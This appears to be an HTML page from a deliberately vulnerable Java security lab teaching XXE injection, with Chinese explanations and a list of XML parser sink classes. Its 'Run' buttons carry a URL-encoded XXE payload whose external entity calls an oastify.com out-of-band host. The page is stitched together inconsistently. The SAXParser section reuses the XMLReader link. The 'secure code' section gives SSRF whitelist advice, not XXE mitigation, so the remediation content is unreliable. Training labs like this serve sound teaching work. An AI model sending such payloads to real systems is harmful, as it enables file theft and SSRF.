<!DOCTYPE html>
<html xmlns:th="http://www.thymeleaf.org">
<head th:replace="~{common/common::head}"></head>
<body>
<div class="layuimini-container">
    <div class="layuimini-main">
        <div class="layui-row layui-col-space15">
            <div class="layui-col-md12">
                <fieldset class="layui-elem-field layui-field-title">
                    <legend>
                        <a style="color: rgb(30 159 255)" class="xxe">XXE (XML Enternal Entity Injection)</a>
                    </legend>
                    <blockquote class="layui-elem-quote layui-quote-nm"
                                style="font-size: 15px;background-color: #a7deefab;box-shadow: 0 .125rem .25rem rgba(0, 0, 0, .075) !important">
                        <pre>  XXE(XML外部实体注入)：由于在解析XML时未限制对外部实体的处理，导致攻击者通过注入恶意XML数据，引发拒绝服务、文件读取、SSRF、命令执行等严重安全问题</pre>
                        <pre>  漏洞场景：当数据传输的Content-Type为text/xml或application/xml时，可以针对XML格式的请求进行黑盒测试，检测潜在的XXE漏洞。此外，在文件上传功能中，如果使用插件进行文件解析或预览(如上传Excel文件时)，也可能导致文件中的XXE Payload被执行，引发安全风险</pre>
                    </blockquote>
                </fieldset>
            </div>

            <div class="layui-col-md12" style="margin-top: 10px">
                <div class="layui-row layui-col-space15">
                    <div class="layui-col-md6">
                        <h1><span class="iconfont icon-bug"> 漏洞环境：XMLReader</span></h1>
                        <div class="layui-tab layui-tab-brief">
                            <div class="layui-tab-content">
                                <div class="layui-tab-item layui-show">
                                    <blockquote class="layui-elem-quote main_btn">
                                        <p>可尝试使用file、http(s)、dict、gopher等协议进行测试</p>
                                        <a target="_blank" href="/xxe/vulXMLReader?payload=%3c%3f%78%6d%6c%20%76%65%72%73%69%6f%6e%3d%22%31%2e%30%22%20%65%6e%63%6f%64%69%6e%67%3d%22%75%74%66%2d%38%22%3f%3e%3c%21%44%4f%43%54%59%50%45%20%74%65%73%74%20%5b%3c%21%45%4e%54%49%54%59%20%78%78%65%20%53%59%53%54%45%4d%20%22%68%74%74%70%3a%2f%2f%31%6c%6e%71%69%71%37%78%7a%32%64%39%6c%39%32%34%63%6e%71%65%6d%7a%38%68%73%38%79%30%6d%35%61%75%2e%6f%61%73%74%69%66%79%2e%63%6f%6d%22%3e%5d%3e%3c%72%6f%6f%74%3e%26%78%78%65%3b%3c%2f%72%6f%6f%74%3e">
                                            <button class="layui-btn layui-btn-normal" style="width: 100px; margin-left: 10px;">
                                                <span class="iconfont icon-zhihang">Run</span>
                                            </button>
                                        </a>
                                    </blockquote>
                                </div>

                                <div class="layui-col-md12">
                                    <div class="layui-card">
                                        <div class="layui-card-header"><i class="fa fa-bullhorn icon-tip"></i>tips</div>
                                        <div class="layui-card-body layui-text layadmin-text">
                                            <pre style="color: #28333e;font-size: 15px;">代码审计SINK点：
  1、XMLReader
  2、SAXReader
  3、DocumentBuilder
  4、XMLStreamReader
  5、SAXBuilder
  6、SAXParser
  7、SAXSource
  8、TransformerFactory
  9、SAXTransformerFactory
  10、SchemaFactory
  11、Unmarshaller
  12、XPathExpression</pre>
                                        </div>
                                    </div>
                                </div>

                            </div>
                        </div>
                    </div>

                    <div class="layui-col-md6">
                        <h1><span class="iconfont icon-code"> 缺陷代码</span></h1>
                        <div class="m-auto div-shadow shadow p-3 mb-5 bg-white rounded">
                            <div class="code-editor" id="vul1URLConnection"></div>
                        </div>
                    </div>
                </div>
            </div>

            <div class="layui-col-md12" style="margin-top: 10px">
                <div class="layui-row layui-col-space15">
                    <div class="layui-col-md6">
                        <h1><span class="iconfont icon-bug"> 漏洞环境：SAXParser</span></h1>
                        <div class="layui-tab layui-tab-brief">
                            <div class="layui-tab-content">
                                <div class="layui-tab-item layui-show">
                                    <blockquote class="layui-elem-quote main_btn">
                                        <p>可尝试使用file、http(s)、dict、gopher等协议进行测试</p>
                                        <a target="_blank" href="/xxe/vulXMLReader?payload=%3c%3f%78%6d%6c%20%76%65%72%73%69%6f%6e%3d%22%31%2e%30%22%20%65%6e%63%6f%64%69%6e%67%3d%22%75%74%66%2d%38%22%3f%3e%3c%21%44%4f%43%54%59%50%45%20%74%65%73%74%20%5b%3c%21%45%4e%54%49%54%59%20%78%78%65%20%53%59%53%54%45%4d%20%22%68%74%74%70%3a%2f%2f%31%6c%6e%71%69%71%37%78%7a%32%64%39%6c%39%32%34%63%6e%71%65%6d%7a%38%68%73%38%79%30%6d%35%61%75%2e%6f%61%73%74%69%66%79%2e%63%6f%6d%22%3e%5d%3e%3c%72%6f%6f%74%3e%26%78%78%65%3b%3c%2f%72%6f%6f%74%3e">
                                            <button class="layui-btn layui-btn-normal" style="width: 100px; margin-left: 10px;">
                                                <span class="iconfont icon-zhihang">Run</span>
                                            </button>
                                        </a>
                                    </blockquote>
                                </div>

                                <div class="layui-col-md12">
                                    <div class="layui-card">
                                        <div class="layui-card-header"><i class="fa fa-bullhorn icon-tip"></i>tips</div>
                                        <div class="layui-card-body layui-text layadmin-text">
                                            <pre style="color: #28333e;font-size: 15px;">代码审计SINK点：
  1、XMLReader
  2、SAXReader
  3、DocumentBuilder
  4、XMLStreamReader
  5、SAXBuilder
  6、SAXParser
  7、SAXSource
  8、TransformerFactory
  9、SAXTransformerFactory
  10、SchemaFactory
  11、Unmarshaller
  12、XPathExpression</pre>
                                        </div>
                                    </div>
                                </div>

                            </div>
                        </div>
                    </div>

                    <div class="layui-col-md6">
                        <h1><span class="iconfont icon-code"> 缺陷代码</span></h1>
                        <div class="m-auto div-shadow shadow p-3 mb-5 bg-white rounded">
                            <div class="code-editor" id="vul1URLConnection"></div>
                        </div>
                    </div>
                </div>
            </div>

            <div class="layui-col-md12" style="margin-top: 10px">
                <div class="layui-row layui-col-space15">
                    <div class="layui-col-md6">
                        <h1><span class="iconfont icon-anquan"> 安全代码：限制协议、白名单</span></h1>
                        <div class="layui-tab layui-tab-brief">
                            <div class="layui-tab-content">
                                <div class="layui-tab-item layui-show">
                                    <blockquote class="layui-elem-quote main_btn">
                                        <p>限制http(s)协议、请求白名单(baidu.com、whgojp.top)</p>
                                        <a target="_blank" href="/ssrf/safe1-WhiteList?url=http://baidu.com">
                                            <button class="layui-btn layui-btn-normal" style="width: 100px; margin-left: 10px;">
                                                <span class="iconfont icon-zhihang">Run</span>
                                            </button>
                                        </a>
                                    </blockquote>
                                </div>

                                <div class="layui-col-md12">
                                    <div class="layui-card">
                                        <div class="layui-card-header"><i class="fa fa-bullhorn icon-tip"></i>tips</div>
                                        <div class="layui-card-body layui-text layadmin-text">
                                            <pre style="color: #28333e;font-size: 15px;">安全编码建议：
    1、URL做白名单处理，域名识别IP，过滤内网IP
    2、校验返回的内容是否与预期一致
    3、禁止302跳转，或每跳转一次都进行校验目的地址是否为内网地址或合法地址。
    4、禁用高危协议：gopher、dict、file、ftp、file等，只允许http/https
项目主要关注的是漏洞的产生与修复，关于攻击绕过手法(@等分隔符、本地回环地址、短网址、DNS重绑定、八(十六)进制)，这里就不再展开……</pre>
                                        </div>
                                    </div>
                                </div>

                            </div>
                        </div>
                    </div>

                    <div class="layui-col-md6">
                        <h1><span class="iconfont icon-code"> 安全代码</span></h1>
                        <div class="m-auto div-shadow shadow p-3 mb-5 bg-white rounded">
                            <div class="code-editor" id="safe1WhiteList"></div>
                        </div>
                    </div>
                </div>
            </div>

        </div>
    </div>
</div>

<div th:replace="~{common/common::script}"></div>
<script type="text/javascript">
    layui.use(['layer', 'miniTab', 'common', 'upload'], function () {
        var $ = layui.jquery,
            layer = layui.layer,
            miniTab = layui.miniTab;

        miniTab.listen();
        layer.msg("XXE-XML外部实体注入");

        var cmConfig = {
            lineNumbers: true,
            lineWrapping: false,
            indentUnit: 4,
            indentWithTabs: true,
            theme: 'juejin',
            styleActiveLine: { nonEmpty: true },
            fontSize: "18px",
            mode: "text/x-java"
        };

        var cmConfigSafe = {
            lineNumbers: true,
            lineWrapping: false,
            indentUnit: 4,
            indentWithTabs: true,
            theme: 'juejinsafe',
            styleActiveLine: { nonEmpty: true },
            fontSize: "18px",
            mode: "text/x-java"
        };

        CodeMirror(document.getElementById("vul1URLConnection"), Object.assign({}, cmConfig, {
            value: vul1URLConnection
        }));

        CodeMirror(document.getElementById("safe1WhiteList"), Object.assign({}, cmConfigSafe, {
            value: safe1WhiteList
        }));

    });

    $('.xxe').hover(function () {
        $(this).css('cursor', 'pointer');
        layer.tips('攻击流程图', this, {
            tips: [1, '#0051ff'],
            time: 2000
        });
    });

    $('.xxe').on('click', function () {
        layer.open({
            type: 1,
            title: false,
            closeBtn: 1,
            area: ['859px', '506px'], // 宽高可以根据需要调整
            shadeClose: true,
            content: '<div style="text-align: center;"><img src="/static/images/vul/xxe/xxe.png" style="width: 100%; height: 50%;"></div>'
        });
    });
</script>

</body>
</html>
